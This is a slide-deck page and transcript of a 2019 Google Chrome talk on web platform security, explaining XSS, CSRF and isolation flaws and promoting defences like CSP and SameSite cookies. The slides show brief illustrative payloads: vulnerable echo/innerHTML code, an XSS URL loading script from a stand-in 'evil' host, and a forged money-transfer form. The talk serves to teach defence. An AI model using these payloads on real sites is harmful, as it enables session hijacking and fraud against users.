Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security @ TechDays 2019

Mike West
PRO
June 03, 2019
Programming
1
160

Web Platform Security @ TechDays 2019

Web Platform Security.

Mike West
PRO

June 03, 2019
Tweet

More Decks by Mike West

See All by Mike West
W3C Permissions Workshop - 2022-12-05
mikewest
PRO
0
100
Isolation by Default
mikewest
PRO
0
1.7k
The Web We Can Ship
mikewest
PRO
0
440
Web Platform Security @ CMS Security Summit 2020
mikewest
PRO
0
2.8k
Cookies are bad @ HTTP Workshop 2019
mikewest
PRO
0
410
Web Platform Security @ CMS Security Summit
mikewest
PRO
0
110
Web Platform Security PhD Summit @ Google Munich
mikewest
PRO
2
890
BSides Munich
mikewest
PRO
0
320
Hardening the Web Platform - AppSec EU, 2016
mikewest
PRO
5
1.4k

Other Decks in Programming

See All in Programming
Pinia Colada が実現するスマートな非同期処理
naokihaba
2
160
Vue SFCのtemplateでTypeScriptの型を活用しよう
tsukkee
3
1.5k
Vitest Browser Mode への期待 / Vitest Browser Mode
odanado
PRO
2
1.7k
Realtime API 入門
riofujimon
0
110
GitHub Actionsのキャッシュと手を挙げることの大切さとそれに必要なこと
satoshi256kbyte
5
390
Content Security Policy入門 セキュリティ設定と 違反レポートのはじめ方 / Introduction to Content Security Policy Getting Started with Security Configuration and Violation Reporting
uskey512
1
430
破壊せよ!データ破壊駆動で考えるドメインモデリング / data-destroy-driven
minodriven
16
4.1k
ECS Service Connectのこれまでのアップデートと今後のRoadmapを見てみる
tkikuc
2
210
現場で役立つモデリング 超入門
masuda220
PRO
13
2.9k
レガシーな Android アプリのリアーキテクチャ戦略
oidy
1
170
EventSourcingの理想と現実
wenas
6
2.1k
Universal Linksの実装方法と陥りがちな罠
kaitokudou
1
220

Featured

See All Featured
Git: the NoSQL Database
bkeepers
PRO
425
64k
StorybookのUI Testing Handbookを読んだ
zakiyama
26
5.2k
Mobile First: as difficult as doing things right
swwweet
222
8.9k
Raft: Consensus for Rubyists
vanstee
136
6.6k
Writing Fast Ruby
sferik
626
61k
Measuring & Analyzing Core Web Vitals
bluesmoon
1
40
Art, The Web, and Tiny UX
lynnandtonic
296
20k
Agile that works and the tools we love
rasmusluckow
327
21k
Unsuck your backbone
ammeep
668
57k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
355
29k
Intergalactic Javascript Robots from Outer Space
tanoku
268
27k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
6.9k

Transcript

  1. Web Platform Security Mike West, Google Chrome @mikewest [email protected] http://bit.ly/wps_techdays_2019

  2. None
  3. None

  4. Google Vulnerability Reward Program (VRP) payouts in 2018 XSS 35.6%

    CSRF 3.2% Clickjacking 4.2% Other web bugs 7.8% Non-web issues 49.1% Mobile app vulnerabilities Business logic (authorization) Server /network misconfigurations ...

  5. Injections <?php echo $_GET["query"] ?> foo.innerHTML = location.hash.slice(1) 1. Logged

    in user visits attacker's page 2. Attacker navigates user to a vulnerable URL 3. Script runs, attacker gets access to user's session … and many other patterns Bugs: Cross-site scripting (XSS) https://victim.example/?query=<script src="//evil/">

  6. Insufficient isolation 1. Logged in user visits attacker's page 2.

    Attacker sends cross-origin request to vulnerable URL 3. Attacker takes action on behalf of user, or infers information about the user's data in the vulnerable app. Bugs: Cross-site request forgery (CSRF), XS-leaks, timing, ... <form action="/transferMoney"> <input name="recipient" value="Lukas" /> <input name="amount" value="10" /> <form action="//victim.example/transferMoney"> <input name="recipient" value="Attacker" /> <input name="amount" value="∞" />

  7. Insufficient isolation New classes of flaws related to insufficient isolation

    on the web: - Microarchitectural issues (Spectre / Meltdown) - Advanced web APIs used by attackers - Improved exploitation techniques The number and severity of these flaws is growing.

  8. Collaborate in standards bodies

  9. https://w3c.github.io/webappsec-csp/ https://csp.withgoogle.com/

  10. https://wicg.github.io/trusted-types

  11. https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis https://web.dev/samesite-cookies-explained/

  12. https://w3c.github.io/webappsec-fetch-metadata

  13. https://github.com/whatwg/html/issues/3740

  14. https://github.com/whatwg/fetch/issues/687

  15. https://www.arturjanc.com/cross-origin-infoleaks.pdf

  16. Thanks! Mike West, Google Chrome @mikewest [email protected] http://bit.ly/wps_techdays_2019